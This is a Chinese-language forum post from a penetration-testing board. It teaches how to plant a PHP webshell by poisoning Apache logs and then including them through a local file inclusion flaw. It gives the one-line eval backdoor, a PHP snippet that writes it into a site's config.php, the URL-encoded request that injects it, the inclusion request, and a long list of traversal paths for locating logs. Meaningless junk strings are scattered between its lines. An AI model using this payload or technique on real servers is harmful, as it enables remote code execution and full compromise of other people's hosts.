中国网络渗透测试联盟
标题:
php包含apache日志写马
[打印本页]
作者:
admin
时间:
2012-9-15 14:27
标题:
php包含apache日志写马
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。
" w$ F& M! g. p' r* G
" g# _8 c) _- E6 i2 P
比如还是这句一句话木马
1 ?" {* m) ~/ x. b7 h
<?eval($_POST[cmd]);?>
1 p! p C5 ~% X7 w" I& g/ \
/ }- u- i8 e$ @6 Z
到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,
/ q% S# e+ N" s, W6 R% |
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是
! f; k2 D, l+ p' X% R
# c z9 a+ }: G, t1 z
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
# j1 B0 [$ R4 J s0 d1 v
fclose($fp);?> //在config.php里写入一句木马语句
7 s4 m5 u7 M/ I; j5 w; ?# A
; }" n3 a$ V6 S- X
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
p& C# g. m3 w* l
转换为
+ g7 _! M4 R2 t1 _0 z* Z
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
6 f1 ^5 X; X! K- p1 X1 m
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
" _" x5 E1 {4 G" b9 x5 K
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
4 a- j" L v5 ]6 O. ^
fclose%28%24fp%29%3B%3F%3E
9 O. {: F3 v: y+ P$ b+ N
我们提交
+ }, J3 [5 {8 T% N, w/ O+ ]- k5 a
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
) i. q6 `( [" o5 S
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
+ r1 D5 m/ N" _% L9 G2 O( v3 R
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
& B2 D# J" P7 q, I! b2 z8 v
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
h% I* G d! l/ O: Z8 y
+ z' Z2 x5 K2 _( X6 s
这样就错误日志里就记录下了这行写入webshell的代码。
/ O j. {# @- d1 s) \5 z! i$ X
我们再来包含日志,提交
3 z3 v8 M# `8 q8 ]( J
http://xxx.com/z.php?zizzy=/home
... /logs/www-error_log
" z6 w' E6 v3 g2 _& o1 o% N" c
& U) g- W' w; |' P8 q r
这样webshell就写入成功了,config.php里就写入一句木马语句
* @+ g: O. u+ `; ~2 J9 V- _9 f
OK.
* G" s; Q3 Q7 ^
http://www.xxx.com/forum/config.php
这个就成了我们的webshell
/ X: e; M( U* |( X- J2 A
直接用lanker的客户端一连,主机就是你的了。
. u0 A0 v! |" {: I% j4 \
6 m: v+ t+ ?1 ?3 q1 o7 L
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用
! S8 |5 l$ x, ^, c P4 P: u3 c! J
: u9 K( g2 {+ C' B5 w' m& h! O' R
其他的日志路径,你可以去猜,也可以参照这里。
; }0 s2 D8 ]# M% t1 R9 T% W" `
../../../../../../../../../../var/log/httpd/access_log
4 y! m$ ^& n( R$ V+ O' [, O9 A) L
../../../../../../../../../../var/log/httpd/error_log
f% w! `. V8 w- t3 ~; Y, U
../apache/logs/error.log
! g1 R# N; Z$ L4 {1 ~+ e+ m
../apache/logs/access.log
8 Y5 W8 N- g2 i
../../apache/logs/error.log
! i" K B0 c) J) C9 J" H/ x) s
../../apache/logs/access.log
. t0 v# A h3 W, L( q9 t% H
../../../apache/logs/error.log
7 o8 V0 q$ K% g; Z( Q) W
../../../apache/logs/access.log
+ v" |6 i8 x0 J. [3 S
../../../../../../../../../../etc/httpd/logs/acces_log
+ ~2 C4 v4 @: i u1 _0 W$ P
../../../../../../../../../../etc/httpd/logs/acces.log
* B+ e- i1 U4 }7 e
../../../../../../../../../../etc/httpd/logs/error_log
$ G% }3 g% _) B2 I
../../../../../../../../../../etc/httpd/logs/error.log
) }: L I# ~8 j+ v8 S
../../../../../../../../../../var/www/logs/access_log
8 {6 [7 K. @1 B, h4 s+ m! J
../../../../../../../../../../var/www/logs/access.log
4 g5 ]) y; T% i0 {
../../../../../../../../../../usr/local/apache/logs/access_log
7 I" W/ z! v E) b/ V
../../../../../../../../../../usr/local/apache/logs/access.log
8 M: i2 B5 y& u. H8 O
../../../../../../../../../../var/log/apache/access_log
( m8 Q/ p% \1 G/ v* Z
../../../../../../../../../../var/log/apache/access.log
" F& k: G! y6 ]' l4 S8 m
../../../../../../../../../../var/log/access_log
, N8 [ I) {6 @1 X: y. o
../../../../../../../../../../var/www/logs/error_log
) e0 N# g6 \& J7 }1 O2 i
../../../../../../../../../../var/www/logs/error.log
6 v5 A. ] p2 ]4 t9 i5 b: w* w q
../../../../../../../../../../usr/local/apache/logs/error_log
/ G% o5 S2 A# a4 ~, c$ D
../../../../../../../../../../usr/local/apache/logs/error.log
: }: _; ^9 n& S2 f+ g: r. V% p% P
../../../../../../../../../../var/log/apache/error_log
* s( O% n! F, q1 h
../../../../../../../../../../var/log/apache/error.log
8 v/ K. \: ]2 n; m$ a0 {
../../../../../../../../../../var/log/access_log
! k* p" a, e6 X/ _( k, g
../../../../../../../../../../var/log/error_log
( Y3 v* N5 v& O" u; J6 ]
/var/log/httpd/access_log
@, ?$ T2 I2 z# M. S, r6 |8 l
/var/log/httpd/error_log
6 B" ]9 ]" n; }" m, T V
../apache/logs/error.log
0 @# \7 X' |9 p9 \5 l
../apache/logs/access.log
6 w; x8 \: M* V' A
../../apache/logs/error.log
/ X1 O D# r# }' h
../../apache/logs/access.log
1 F- M& E L. w. I ^
../../../apache/logs/error.log
: P3 U9 Z" d3 R- }7 g2 |2 w
../../../apache/logs/access.log
8 ~; d: `0 P# H5 I5 n0 _5 F
/etc/httpd/logs/acces_log
( Z3 R6 ^5 a5 E9 |$ I
/etc/httpd/logs/acces.log
. l) R9 W# t: X, f* x) o
/etc/httpd/logs/error_log
( Y* F& }0 q) f# n
/etc/httpd/logs/error.log
" Y9 u1 W* m. `5 q$ c- y
/var/www/logs/access_log
# t8 K' }" n2 Q3 n7 y' h' x" d: I0 l
/var/www/logs/access.log
$ |' }: ?5 C C9 ]& w. r" c6 O8 _8 I
/usr/local/apache/logs/access_log
: x2 p7 T0 u4 M; B8 @
/usr/local/apache/logs/access.log
* Y2 f+ j, f9 l$ c6 ?! b; U, _
/var/log/apache/access_log
4 x- Y/ f4 t) r; o; l
/var/log/apache/access.log
: ^* D9 t2 S4 P2 s. J V
/var/log/access_log
: r p9 v4 q7 n& c# `: l
/var/www/logs/error_log
! w: t( y8 U. x- v0 D2 E
/var/www/logs/error.log
* g; w& _8 E; p+ t$ c
/usr/local/apache/logs/error_log
( p" a9 Z) w7 @$ W( E/ o
/usr/local/apache/logs/error.log
; ^- R/ @6 A& ~ v# Q A# O$ V
/var/log/apache/error_log
! f7 J% u X' E& m X3 y8 ?
/var/log/apache/error.log
- d$ ~4 p) y& J) \% V
/var/log/access_log
" m! g* A, _% I; H6 w
/var/log/error_log
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2